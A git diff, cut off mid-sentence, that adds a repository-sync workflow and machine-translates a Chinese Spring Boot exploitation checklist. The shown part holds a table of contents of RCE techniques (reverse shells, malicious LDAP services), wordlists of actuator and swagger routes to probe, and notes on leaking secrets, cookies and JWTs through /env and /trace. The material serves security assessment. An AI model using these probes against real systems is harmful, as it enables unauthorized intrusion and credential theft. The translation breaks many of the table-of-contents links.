diff --git a/.github/workflows/sync.yml b/.github/workflows/sync.yml new file mode 100644 index 0000000..cf22563 --- /dev/null +++ b/.github/workflows/sync.yml @@ -0,0 +1,24 @@ +# Version: 0.0.1 +# Your GitHub Actions workflow +name: Sync Repositories +on: + push: + branches: [ main ] +jobs: + sync: + runs-on: ubuntu-latest + steps: + - name: Checkout Source Repo + uses: actions/checkout@v2 + with: + repository: 'null' + token: ${{ secrets.YOUR_GITHUB_TOKEN }} + path: 'SpringBootVulExploit' + - name: Sync Repositories + run: | + rsync -a --delete ./SpringBootVulExploit/ . + git config user.name 'davidfortytwo' + git config user.email 'null' + git add . + git diff-index --quiet HEAD || git commit -m "Sync with source repo" + git push || echo 'Failed to push changes' diff --git a/README.md b/README.md index 2656603..fdc5cce 100644 --- a/README.md +++ b/README.md @@ -1,237 +1,237 @@ # Spring Boot Vulnerability Exploit Check List -Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list +Spring Boot related vulnerability learning materials, a collection of utilization methods and techniques, and a black box security assessment checklist. -## 声明 +Disclaimer -> **⚠️ 本项目所有内容仅作为安全研究和授权测试使用, 相关人员对因误用和滥用该项目造成的一切损害概不负责** +⚠️ All content of this project is for security research and authorized testing purposes only. Relevant personnel shall not be responsible for any damage caused by misuse or abuse of this project." -目录 +Table of contents ----------------- * [Spring Boot Vulnerability Exploit Check List](#spring-boot-vulnerability-exploit-check-list) - * [零:路由和版本](#零路由和版本) - * [0x01:路由知识](#0x01路由知识) - * [0x02:版本知识](#0x02版本知识) - * [组件版本的相互依赖关系:](#组件版本的相互依赖关系) - * [Spring Cloud 与 Spring Boot 版本之间的依赖关系:](#spring-cloud-与-spring-boot-版本之间的依赖关系) - * [Spring Cloud 小版本号的后缀及含义:](#spring-cloud-小版本号的后缀及含义) - * [一:信息泄露](#一信息泄露) - * [0x01:路由地址及接口调用详情泄漏](#0x01路由地址及接口调用详情泄漏) - * [0x02:配置不当而暴露的路由](#0x02配置不当而暴露的路由) - * [0x03:获取被星号脱敏的密码的明文 (方法一)](#0x03获取被星号脱敏的密码的明文-方法一) - * [利用条件:](#利用条件) - * [利用方法:](#利用方法) - * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名) - * [步骤二: jolokia 调用相关 Mbean 获取明文](#步骤二-jolokia-调用相关-mbean-获取明文) - * [0x04:获取被星号脱敏的密码的明文 (方法二)](#0x04获取被星号脱敏的密码的明文-方法二) - * [利用条件:](#利用条件-1) - * [利用方法:](#利用方法-1) - * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-1) - * [步骤二: 使用 nc 监听 HTTP 请求](#步骤二-使用-nc-监听-http-请求) - * [步骤三: 设置 eureka.client.serviceUrl.defaultZone 属性](#步骤三-设置-eurekaclientserviceurldefaultzone-属性) - * [步骤四: 刷新配置](#步骤四-刷新配置) - * [步骤五: 解码属性值](#步骤五-解码属性值) - * [0x05:获取被星号脱敏的密码的明文 (方法三)](#0x05获取被星号脱敏的密码的明文-方法三) - * [利用条件:](#利用条件-2) - * [利用方法:](#利用方法-2) - * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-2) - * [步骤二: 使用 nc 监听 HTTP 请求](#步骤二-使用-nc-监听-http-请求-1) - * [步骤三: 触发对外 http 请求](#步骤三-触发对外-http-请求) - * [步骤四: 刷新配置](#步骤四-刷新配置-1) - * [0x06:获取被星号脱敏的密码的明文 (方法四)](#0x06获取被星号脱敏的密码的明文-方法四) - * [利用条件:](#利用条件-3) - * [利用方法:](#利用方法-3) - * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-3) - * [步骤二: 下载 jvm heap 信息](#步骤二-下载-jvm-heap-信息) - * [步骤三: 使用 MAT 获得 jvm heap 中的密码明文](#步骤三-使用-mat-获得-jvm-heap-中的密码明文) - * [二:远程代码执行](#二远程代码执行) - * [0x01:whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce) - * [利用条件:](#利用条件-4) - * [利用方法:](#利用方法-4) - * [步骤一:找到一个正常传参处](#步骤一找到一个正常传参处) - * [步骤二:执行 SpEL 表达式](#步骤二执行-spel-表达式) - * [漏洞原理:](#漏洞原理) - * [漏洞分析:](#漏洞分析) - * [漏洞环境:](#漏洞环境) - * [0x02:spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce) - * [利用条件:](#利用条件-5) - * [利用方法:](#利用方法-5) - * [步骤一: 托管 yml 和 jar 文件](#步骤一-托管-yml-和-jar-文件) - * [步骤二: 设置 spring.cloud.bootstrap.location 属性](#步骤二-设置-springcloudbootstraplocation-属性) - * [步骤三: 刷新配置](#步骤三-刷新配置) - * [漏洞原理:](#漏洞原理-1) - * [漏洞分析:](#漏洞分析-1) - * [漏洞环境:](#漏洞环境-1) - * [0x03:eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce) - * [利用条件:](#利用条件-6) - * [利用方法:](#利用方法-6) - * [步骤一:架设响应恶意 XStream payload 的网站](#步骤一架设响应恶意-xstream-payload-的网站) - * [步骤二:监听反弹 shell 的端口](#步骤二监听反弹-shell-的端口) - * [步骤三:设置 eureka.client.serviceUrl.defaultZone 属性](#步骤三设置-eurekaclientserviceurldefaultzone-属性) - * [步骤四:刷新配置](#步骤四刷新配置) - * [漏洞原理:](#漏洞原理-2) - * [漏洞分析:](#漏洞分析-2) - * [漏洞环境:](#漏洞环境-2) - * [0x04:jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce) - * [利用条件:](#利用条件-7) - * [利用方法:](#利用方法-7) - * [步骤一:查看已存在的 MBeans](#步骤一查看已存在的-mbeans) - * [步骤二:托管 xml 文件](#步骤二托管-xml-文件) - * [步骤三:准备要执行的 Java 代码](#步骤三准备要执行的-java-代码) - * [步骤四:架设恶意 ldap 服务](#步骤四架设恶意-ldap-服务) - * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口) - * [步骤六:从外部 URL 地址加载日志配置文件](#步骤六从外部-url-地址加载日志配置文件) - * [漏洞原理:](#漏洞原理-3) - * [漏洞分析:](#漏洞分析-3) - * [漏洞环境:](#漏洞环境-3) - * [0x05:jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce) - * [利用条件:](#利用条件-8) - * [利用方法:](#利用方法-8) - * [步骤一:查看已存在的 MBeans](#步骤一查看已存在的-mbeans-1) - * [步骤二:准备要执行的 Java 代码](#步骤二准备要执行的-java-代码) - * [步骤三:托管 class 文件](#步骤三托管-class-文件) - * [步骤四:架设恶意 rmi 服务](#步骤四架设恶意-rmi-服务) - * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口-1) - * [步骤六:发送恶意 payload](#步骤六发送恶意-payload) - * [漏洞原理:](#漏洞原理-4) - * [漏洞分析:](#漏洞分析-4) - * [漏洞环境:](#漏洞环境-4) - * [0x06:restart h2 database query RCE](#0x06restart-h2-database-query-rce) - * [利用条件:](#利用条件-9) - * [利用方法:](#利用方法-9) - * [步骤一:设置 spring.datasource.hikari.connection-test-query 属性](#步骤一设置-springdatasourcehikariconnection-test-query-属性) - * [步骤二:重启应用](#步骤二重启应用) - * [漏洞原理:](#漏洞原理-5) - * [漏洞分析:](#漏洞分析-5) - * [漏洞环境:](#漏洞环境-5) - * [0x07:h2 database console JNDI RCE](#0x07h2-database-console-jndi-rce) - * [利用条件:](#利用条件-10) - * [利用方法:](#利用方法-10) - * [步骤一:访问路由获得 jsessionid](#步骤一访问路由获得-jsessionid) - * [步骤二:准备要执行的 Java 代码](#步骤二准备要执行的-java-代码-1) - * [步骤三:托管 class 文件](#步骤三托管-class-文件-1) - * [步骤四:架设恶意 ldap 服务](#步骤四架设恶意-ldap-服务-1) - * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口-2) - * [步骤六:发包触发 JNDI 注入](#步骤六发包触发-jndi-注入) - * [漏洞分析:](#漏洞分析-6) - * [漏洞环境:](#漏洞环境-6) - * [0x08:mysql jdbc deserialization RCE](#0x08mysql-jdbc-deserialization-rce) - * [利用条件:](#利用条件-11) - * [利用方法:](#利用方法-11) - * [步骤一:查看环境依赖](#步骤一查看环境依赖) - * [步骤二:架设恶意 rogue mysql server](#步骤二架设恶意-rogue-mysql-server) - * [步骤三:设置 spring.datasource.url 属性](#步骤三设置-springdatasourceurl-属性) - * [步骤四:刷新配置](#步骤四刷新配置-1) - * [步骤五:触发数据库查询](#步骤五触发数据库查询) - * [步骤六:恢复正常 jdbc url](#步骤六恢复正常-jdbc-url) - * [漏洞原理:](#漏洞原理-6) - * [漏洞分析:](#漏洞分析-7) - * [漏洞环境:](#漏洞环境-7) - * [0x09:restart logging.config logback JNDI RCE](#0x09restart-loggingconfig-logback-jndi-rce) - * [利用条件:](#利用条件-12) - * [利用方法:](#利用方法-12) - * [步骤一:托管 xml 文件](#步骤一托管-xml-文件) - * [步骤二:托管恶意 ldap 服务及代码](#步骤二托管恶意-ldap-服务及代码) - * [步骤三:设置 logging.config 属性](#步骤三设置-loggingconfig-属性) - * [步骤四:重启应用](#步骤四重启应用) - * [漏洞原理:](#漏洞原理-7) - * [漏洞分析:](#漏洞分析-8) - * [漏洞环境:](#漏洞环境-8) - * [0x0A:restart logging.config groovy RCE](#0x0arestart-loggingconfig-groovy-rce) - * [利用条件:](#利用条件-13) - * [利用方法:](#利用方法-13) - * [步骤一:托管 groovy 文件](#步骤一托管-groovy-文件) - * [步骤二:设置 logging.config 属性](#步骤二设置-loggingconfig-属性) - * [步骤三:重启应用](#步骤三重启应用) - * [漏洞原理:](#漏洞原理-8) - * [漏洞环境:](#漏洞环境-9) - * [0x0B:restart spring.main.sources groovy RCE](#0x0brestart-springmainsources-groovy-rce) - * [利用条件:](#利用条件-14) - * [利用方法:](#利用方法-14) - * [步骤一:托管 groovy 文件](#步骤一托管-groovy-文件-1) - * [步骤二:设置 spring.main.sources 属性](#步骤二设置-springmainsources-属性) - * [步骤三:重启应用](#步骤三重启应用-1) - * [漏洞原理:](#漏洞原理-9) - * [漏洞环境:](#漏洞环境-10) - * [0x0C:restart spring.datasource.data h2 database RCE](#0x0crestart-springdatasourcedata-h2-database-rce) - * [利用条件:](#利用条件-15) - * [利用方法:](#利用方法-15) - * [步骤一:托管 sql 文件](#步骤一托管-sql-文件) - * [步骤二:设置 spring.datasource.data 属性](#步骤二设置-springdatasourcedata-属性) - * [步骤三:重启应用](#步骤三重启应用-2) - * [漏洞原理:](#漏洞原理-10) - * [漏洞环境:](#漏洞环境-11) - - - -## 零:路由和版本 - -### 0x01:路由知识 - -- 有些程序员会自定义 `/manage`、`/management` 、**项目 App 相关名称**为 spring 根路径 -- Spring Boot Actuator 1.x 版本默认内置路由的起始路径为 `/` ,2.x 版本则统一以 `/actuator` 为起始路径 -- Spring Boot Actuator 默认的内置路由名字,如 `/env` 有时候也会被程序员修改,比如修改成 `/appenv` - - - -### 0x02:版本知识 - -> Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合。 - - - -#### 组件版本的相互依赖关系: - -| 依赖项 | 版本列表及依赖组件版本 | -| -------------------------- | ------------------------------------------------------------ | + * [zero: route and version](#zero route and version) + * [0x01: Routing knowledge] (#0x01 Routing knowledge) + * [0x02: Version knowledge] (#0x02 Version knowledge) + * [Interdependencies of component versions:] (# Interdependencies of component versions) + * [Dependencies between Spring Cloud and Spring Boot versions:] (dependencies between #spring-cloud-and-spring-boot-versions) + * [Suffix and meaning of Spring Cloud minor version number:](#spring-cloud-suffix and meaning of minor version number) + * [One: Information Leakage](#One Information Leakage) + * [0x01: Routing address and interface call details leaked](#0x01 Routing address and interface call details leaked) + * [0x02: Route exposed due to improper configuration](#0x02 Route exposed due to improper configuration) + * [0x03: Obtain the plaintext of the password desensitized by asterisks (method 1)](#0x03 Obtain the plaintext of the password desensitized by asterisks - method 1) + * [Conditions of use:](#Conditions of use) + * [How to use:](#How to use) + * [Step 1: Find the attribute name you want to get](#Step 1 - Find the attribute name you want to get) + * [Step 2: Jolokia calls the relevant MBean to obtain the plaintext] (#Step 2-jolokia-calls the relevant-mbean-obtains the plaintext) + * [0x04: Obtain the plaintext of the password desensitized by asterisks (method 2)](#0x04 Obtain the plaintext of the password desensitized by asterisks - method 2) + * [Usage Conditions:](#Usage Conditions-1) + * [Utilization method:](#Utilization method-1) + * [Step 1: Find the attribute name you want to get](#Step 1-Find the attribute name you want to get-1) + * [Step 2: Use nc to listen to HTTP requests](#Step 2-Use-nc-listen-http-request) + * [Step 3: Set eureka.client.serviceUrl.defaultZone property](#Step 3-Setting-eurekaclientserviceurldefaultzone-property) + * [Step 4: Refresh Configuration](#Step 4 - Refresh Configuration) + * [Step 5: Decode property value](#Step 5-Decode property value) + * [0x05: Obtain the plaintext of the password desensitized by asterisks (method 3)](#0x05 Obtain the plaintext of the password desensitized by asterisks - method 3) + * [Conditions of use:] (#Conditions of use-2) + * [How to use:](#Method to use-2) + * [Step 1: Find the attribute name you want to get](#Step 1-Find the attribute name you want to get-2) + * [Step 2: Use nc to listen to HTTP requests](#Step 2-use-nc-listen-http-request-1) + * [Step 3: Trigger external http request](#Step 3-Trigger external-http-request) + * [Step 4: Refresh Configuration](#Step 4-Refresh Configuration-1) + * [0x06: Obtain the plaintext of the password desensitized by asterisks (method 4)](#0x06 Obtain the plaintext of the password desensitized by asterisks - method 4) + * [Conditions of use:] (#Conditions of use-3) + * [How to use:](#Method to use-3) + * [Step 1: Find the attribute name you want to get](#Step 1-Find the attribute name you want to get-3) + * [Step 2: Download jvm heap information](#Step 2-download-jvm-heap-information) + * [Step 3: Use MAT to obtain the password plaintext in jvm heap](#Step 3 - use -mat-obtain the password plaintext in -jvm-heap-) + * [Two: Remote Code Execution](#Two Remote Code Execution) + * [0x01: whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce) + * [Conditions of use:] (#Conditions of use-4) + * [How to exploit:](#Method to exploit-4) + * [Step 1: Find a normal parameter passing place](#Step 1 find a normal parameter passing place) + * [Step 2: Execute SpEL expression](#Step 2 execute-spel-expression) + * [Vulnerability principle:] (# Vulnerability principle) + * [vulnerability analysis:] (#vulnerability analysis) + * [vulnerability environment:] (#vulnerability environment) + * [0x02: spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce) + * [Usage Conditions:] (#Usage Conditions-5) + * [How to exploit:](#Method to exploit-5) + * [Step 1: Hosting yml and jar files](#Step 1-hosting-yml-and-jar-files) + * [Step 2: Set spring.cloud.bootstrap.location property](#Step 2-setting-springcloudbootstraplocation-property) + * [Step 3: Refresh Configuration](#Step 3 - Refresh Configuration) + * [Vulnerability principle:] (# Vulnerability principle-1) + * [vulnerability analysis:] (#vulnerability analysis-1) + * [vulnerability environment:] (#vulnerability environment-1) + * [0x03: eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce) + * [Usage Conditions:] (#Usage Conditions-6) + * [How to exploit:](#Method to exploit-6) + * [Step 1: Set up a website responding to malicious XStream payload](#Step 1 set up a website responding to malicious-xstream-payload-) + * [Step 2: Listen to the port of the rebound shell] (#Step 2 listen to the port of the rebound-shell-) + * [Step 3: Set eureka.client.serviceUrl.defaultZone property] (#Step 3 setting -eurekaclientserviceurldefaultzone-property) + * [Step 4: Refresh Configuration](#Step 4 Refresh Configuration) + * [Vulnerability principle:] (# Vulnerability principle-2) + * [vulnerability analysis:] (#vulnerability analysis-2) + * [vulnerability environment:] (#vulnerability environment-2) + * [0x04: jolokia logback JNDI RCE] (#0x04jolokia-logback-jndi-rce) + * [Conditions of use:] (#Conditions of use-7) + * [How to exploit:](#Method to exploit-7) + * [Step 1: View existing MBeans](#Step 1 View existing-mbeans) + * [Step 2: hosting xml file](#step 2 hosting-xml-file) + * [Step 3: Prepare the Java code to be executed](#Step 3 prepare the -java-code to be executed) + * [Step 4: Set up malicious ldap service](#Step 4 set up malicious-ldap-service) + * [Step 5: Listen to the port of the rebound shell] (#Step 5 listen to the port of the rebound-shell-) + * [Step 6: Load log configuration file from external URL address](#Step 6 Load log configuration file from external-url-address) + * [Vulnerability principle:] (# Vulnerability principle-3) + * [vulnerability analysis:] (#vulnerability analysis-3) + * [vulnerability environment:] (#vulnerability environment-3) + * [0x05: jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce) + * [Conditions of use:] (#Conditions of use-8) + * [Exploitation method:] (# Exploitation method-8) + * [Step 1: View existing MBeans](#Step 1 View existing-mbeans-1) + * [Step 2: Prepare the Java code to be executed](#Step 2 Prepare the -java-code to be executed) + * [Step 3: hosting class files](#Step 3 hosting-class-files) + * [Step 4: Set up malicious rmi service](#Step 4 set up malicious-rmi-service) + * [Step 5: Listen to the port of the bounce shell] (#Step 5 listen to the port of bounce-shell-1) + * [Step 6: Send malicious payload](#Step 6 send malicious-payload) + * [Vulnerability principle:] (# Vulnerability principle-4) + * [vulnerability analysis:] (#vulnerability analysis-4) + * [vulnerability environment:] (#vulnerability environment-4) + * [0x06: restart h2 database query RCE](#0x06restart-h2-database-query-rce) + * [Conditions of use:] (#Conditions of use-9) + * [How to exploit:](#Method to exploit-9) + * [Step 1: Set spring.datasource.hikari.connection-test-query property](#Step 1 set-springdatasourcehikariconnection-test-query-property) + * [Step 2: Restart the application] (#Step 2 restart the application) + * [Vulnerability principle:] (# Vulnerability principle-5) + * [vulnerability analysis:] (#vulnerability analysis-5) + * [vulnerability environment:] (#vulnerability environment-5) + * [0x07: h2 database console JNDI RCE](#0x07h2-database-console-jndi-rce) + * [Usage Conditions:](#Usage Conditions-10) + * [How to exploit:](#Method to exploit-10) + * [Step 1: Access routing to get jsessionid](#Step 1 Access routing to get -jsessionid) + * [Step 2: Prepare the Java code to be executed](#Step 2 prepare the Java code to be executed-java-code-1) + * [Step 3: hosting class files] (#step 3 hosting-class-file-1) + * [Step 4: Set up malicious ldap service](#Step 4 set up malicious-ldap-service-1) + * [Step 5: Listen to the port of the bounce shell] (#Step 5 listen to the port of bounce-shell-2) + * [Step 6: Send a package to trigger JNDI injection] (#Step 6 Send a package to trigger -jndi-injection) + * [vulnerability analysis:] (#vulnerability analysis-6) + * [vulnerability environment:] (#vulnerability environment-6) + * [0x08: mysql jdbc deserialization RCE] (#0x08mysql-jdbc-deserialization-rce) + * [Conditions of use:] (#Conditions of use-11) + * [How to exploit:](#Method to exploit-11) + * [Step 1: View environment dependencies](#Step 1 to view environment dependencies) + * [Step 2: Set up malicious rogue mysql server](#Step 2 set up malicious-rogue-mysql-server) + * [Step 3: Set spring.datasource.url property](#Step 3 set-springdatasourceurl-property) + * [Step 4: Refresh Configuration](#Step 4 Refresh Configuration-1) + * [Step 5: Trigger database query] (#Step 5 trigger database query) + * [Step 6: Restore normal jdbc url](#Step 6 Restore to normal-jdbc-url) + * [Vulnerability principle:] (# Vulnerability principle-6) + * [vulnerability analysis:] (#vulnerability analysis-7) + * [vulnerability environment:] (#vulnerability environment-7) + * [0x09: restart logging.config logback JNDI RCE](#0x09restart-loggingconfig-logback-jndi-rce) + * [Conditions of use:] (#Conditions of use-12) + * [Method of Exploitation:] (#Method of Exploitation-12) + * [Step 1: hosting xml file](#step 1 hosting-xml-file) + * [Step 2: hosting malicious ldap services and codes] (#Step 2 hosting malicious-ldap-services and codes) + * [Step 3: Set logging.config property](#Step 3 set-loggingconfig-property) + * [Step 4: Restart the application] (#Step 4 restart the application) + * [Vulnerability Principle:] (# Vulnerability Principle-7) + * [vulnerability analysis:] (#vulnerability analysis-8) + * [vulnerability-environment:] (#vulnerability-environment-8) + * [0x0A: restart logging.config groovy RCE](#0x0arestart-loggingconfig-groovy-rce) + * [Conditions of use:] (#Conditions of use-13) + * [How to exploit:](#Method to exploit-13) + * [Step 1: hosting groovy files](#step 1 hosting-groovy-files) + * [Step 2: Set logging.config property](#Step 2 set-loggingconfig-property) + * [Step 3: Restart the application] (#Step 3 restart the application) + * [Vulnerability Principle:] (# Vulnerability Principle-8) + * [vulnerability environment:] (#vulnerability environment-9) + * [0x0B: restart spring.main.sources groovy RCE](#0x0brestart-springmainsources-groovy-rce) + * [Conditions of use:] (#Conditions of use-14) + * [Method of Exploitation:] (#Method of Exploitation-14) + * [Step 1: hosting groovy files](#step 1 hosting-groovy-files-1) + * [Step 2: Set spring.main.sources property](#Step 2 set-springmainsources-property) + * [Step 3: Restart application] (#Step 3 restart application-1) + * [Exploitation Principle:] (#Exploitation Principle-9) + * [vulnerability environment:] (#vulnerability environment-10) + * [0x0C: restart spring.datasource.data h2 database RCE](#0x0crestart-springdatasourcedata-h2-database-rce) + * [Conditions of use:] (#Conditions of use-15) + * [How to exploit:](#Method to exploit-15) + * [Step 1: hosting sql file](#Step 1 hosting-sql-file) + * [Step 2: Set spring.datasource.data property](#Step 2 set-springdatasourcedata-property) + * [Step 3: Restart the application] (#Step 3 Restart the application-2) + * [Vulnerability principle:] (# Vulnerability principle-10) + * [vulnerability environment:] (#vulnerability environment-11) + + + +## zero: route and version + +### 0x01: routing knowledge + +- Some programmers will customize `/manage`, `/management`, **Project App related name** as the spring root path +- In Spring Boot Actuator version 1.x, the default built-in route starts at `/`, and in version 2.x, it uses `/actuator` as the starting path +- The default built-in routing name of Spring Boot Actuator, such as `/env`, is sometimes modified by programmers, such as `/appenv` + + + +### 0x02: version knowledge + +> Spring Cloud is based on Spring Boot to build services, and provides common functions such as configuration management, service registration and discovery, intelligent routing and other common functions to help quickly develop a series of ordered collections of distributed systems. + + + +#### Interdependence of component versions: + +| Dependencies | Version List and Dependent Component Versions | +| -------------------------- | ---------------------- ----------------------------------------- | | spring-boot-starter-parent | [spring-boot-starter-parent](https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent) | -| spring-boot-dependencies | [spring-boot-dependencies](https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-dependencies) | -| spring-cloud-dependencies | [spring-cloud-dependencies](https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies) | +| spring-boot-dependencies | [spring-boot-dependencies](https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-dependencies) | +| spring-cloud-dependencies | [spring-cloud-dependencies](https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies) | -#### Spring Cloud 与 Spring Boot 版本之间的依赖关系: +#### Dependencies between Spring Cloud and Spring Boot versions: -| Spring Cloud 大版本 | Spring Boot 版本 | -| ------------------- | ------------------------------------ | -| Angel | 兼容 Spring Boot 1.2.x | -| Brixton | 兼容 Spring Boot 1.3.x、1.4.x | -| Camden | 兼容 Spring Boot 1.4.x、1.5.x | -| Dalston | 兼容 Spring Boot 1.5.x,不兼容 2.0.x | -| Edgware | 兼容 Spring Boot 1.5.x,不兼容 2.0.x | -| Finchley | 兼容 Spring Boot 2.0.x,不兼容 1.5.x | -| Greenwich | 兼容 Spring Boot 2.1.x | -| Hoxton | 兼容 Spring Boot 2.2.x | +| Spring Cloud Major Version | Spring Boot Version | +| ------------------- | ----------------------------- ------- | +| Angel | Compatible with Spring Boot 1.2.x | +| Brixton | Compatible with Spring Boot 1.3.x, 1.4.x | +| Camden | Compatible with Spring Boot 1.4.x, 1.5.x | +| Dalston | Compatible with Spring Boot 1.5.x, not 2.0.x | +| Edgware | Compatible with Spring Boot 1.5.x, not compatible with 2.0.x | +| Finchley | Compatible with Spring Boot 2.0.x, not 1.5.x | +| Greenwich | Compatible with Spring Boot 2.1.x | +| Hoxton | Compatible with Spring Boot 2.2.x | -#### Spring Cloud 小版本号的后缀及含义: +#### The suffixes and meanings of the minor version number of Spring Cloud: -| 小版本号后缀 | 含义 | -| -------------- | --------------------------------------- | -| BUILD-SNAPSHOT | 快照版,代码不是固定,处于变化之中 | -| MX | 里程碑版 | -| RCX | 候选发布版 | -| RELEASE | 正式发布版 | -| SRX | (修复错误和 bug 并再次发布的)正式发布版 | +| Minor version number suffix | Meaning | +| -------------- | ---------------------------------- ----- | +| BUILD-SNAPSHOT | Snapshot version, the code is not fixed, it is changing | +| MX | Milestone Edition | +| RCX | Release Candidate | +| RELEASE | Official Release | +| SRX | (bug fixes and re-release) release | -## 一:信息泄露 +## 1: Information disclosure -### 0x01:路由地址及接口调用详情泄漏 +### 0x01: Routing address and interface call details leaked -> 开发人员没有意识到地址泄漏会导致安全隐患或者开发环境切换为线上生产环境时,相关人员没有更改配置文件,忘记切换环境配置等 +> Developers do not realize that address leakage will lead to security risks or when the development environment is switched to an online production environment, the relevant personnel did not change the configuration file, forgot to switch the environment configuration, etc. > -直接访问以下两个 swagger 相关路由,验证漏洞是否存在: +Directly visit the following two swagger-related routes to verify whether the vulnerability exists: ``` /v2/api-docs @@ -240,7 +240,7 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安 -其他一些可能会遇到的 swagger、swagger codegen、swagger-dubbo 等相关接口路由: +Some other related interface routes such as swagger, swagger codegen, swagger-dubbo that may be encountered: ``` /swagger @@ -255,7 +255,8 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安 /distv2/index.html /swagger/index.html /sw/swagger-ui.html -/api/swagger-ui.html +/api/ +swagger-ui.html /static/swagger.json /user/swagger-ui.html /swagger-ui/index.html @@ -269,7 +270,7 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安 -除此之外,下面的 spring boot actuator 相关路由有时也会包含(或推测出)一些接口地址信息,但是无法获得参数相关信息: +In addition, the following spring boot actuator-related routes sometimes contain (or infer) some interface address information, but parameter-related information cannot be obtained: ``` /mappings @@ -284,19 +285,19 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安 -**一般来讲,暴露出 spring boot 应用的相关接口和传参信息并不能算是漏洞**,但是以 "**默认安全**" 来讲,不暴露出这些信息更加安全。 +**Generally speaking, exposing the relevant interface and parameter information of the spring boot application is not considered a vulnerability**, but in terms of "**default security**", it is safer not to expose this information. -对于攻击者来讲,一般会仔细审计暴露出的接口以增加对业务系统的了解,并会同时检查应用系统是否存在未授权访问、越权等其他业务类型漏洞。 +For attackers, the exposed interfaces are generally carefully audited to increase the understanding of the business system, and at the same time, the application system is checked for unauthorized access, unauthorized access, and other business types of vulnerabilities. -### 0x02:配置不当而暴露的路由 +### 0x02: Route exposed due to improper configuration -> 主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险,或者没有按照标准流程开发,忘记上线时需要修改/切换生产环境的配置 +> Mainly because programmers did not realize that exposing routes may cause security risks during development, or did not develop according to standard procedures, and forgot to modify/switch the configuration of the production environment when going online -参考 [production-ready-endpoints](https://docs.spring.io/spring-boot/docs/1.5.10.RELEASE/reference/htmlsingle/#production-ready-endpoints) 和 [spring-boot.txt](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt),可能因为配置不当而暴露的默认内置路由可能会有: +Refer to [production-ready-endpoints](https://docs.spring.io/spring-boot/docs/1.5.10.RELEASE/reference/htmlsingle/#production-ready-endpoints) and [spring-boot.txt] (https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt), the default built-in routes that may be exposed due to improper configuration may have: ``` /actuator @@ -348,60 +349,60 @@ Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安 -其中对寻找漏洞比较重要接口的有: +Among them, the interfaces that are more important for finding vulnerabilities are: -- `/env`、`/actuator/env` +- `/env`, `/actuator/env` - GET 请求 `/env` 会直接泄露环境变量、内网地址、配置中的用户名等信息;当程序员的属性名命名不规范,例如 password 写成 psasword、pwd 时,会泄露密码明文; + A GET request `/env` will directly leak information such as environment variables, intranet addresses, and user names in configuration; when the programmer’s attribute name is not standardized, for example, when password is written as psasword or pwd, the plaintext of the password will be leaked; - 同时有一定概率可以通过 POST 请求 `/env` 接口设置一些属性,间接触发相关 RCE 漏洞;同时有概率获得星号遮掩的密码、密钥等重要隐私信息的明文。 + At the same time, there is a certain probability that some attributes can be set through the POST request `/env` interface to indirectly trigger related RCE vulnerabilities; at the same time, there is a probability to obtain the plaintext of important private information such as passwords and keys covered by asterisks. -- `/refresh`、`/actuator/refresh` +- `/refresh`, `/actuator/refresh` - POST 请求 `/env` 接口设置属性后,可同时配合 POST 请求 `/refresh` 接口刷新属性变量来触发相关 RCE 漏洞。 + After POST requests the `/env` interface to set attributes, it can also cooperate with the POST request `/refresh` interface to refresh attribute variables to trigger related RCE vulnerabilities. -- `/restart`、`/actuator/restart` +- `/restart`, `/actuator/restart` - 暴露出此接口的情况较少;可以配合 POST请求 `/env` 接口设置属性后,再 POST 请求 `/restart` 接口重启应用来触发相关 RCE 漏洞。 + This interface is rarely exposed; you can use the POST request `/env` interface to set properties, and then POST request `/restart` interface to restart the application to trigger related RCE vulnerabilities. -- `/jolokia`、`/actuator/jolokia` +- `/jolokia`, `/actuator/jolokia` - 可以通过 `/jolokia/list` 接口寻找可以利用的 MBean,间接触发相关 RCE 漏洞、获得星号遮掩的重要隐私信息的明文等。 + You can use the `/jolokia/list` interface to find usable MBeans, indirectly trigger related RCE vulnerabilities, obtain the plaintext of important private information covered by asterisks, etc. -- `/trace`、`/actuator/httptrace` +- `/trace`, `/actuator/httptrace` - 一些 http 请求包访问跟踪信息,有可能在其中发现内网应用系统的一些请求信息详情;以及有效用户或管理员的 cookie、jwt token 等信息。 + Some http request packets access tracking information, in which it is possible to find some request information details of the intranet application system; and valid user or administrator cookies, jwt token and other information. -### 0x03:获取被星号脱敏的密码的明文 (方法一) +### 0x03: Obtain the plaintext of the password desensitized by asterisks (method 1) -> 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 +> When accessing the /env interface, spring actuator will replace the attribute values corresponding to some attribute names with sensitive keywords (such as password, 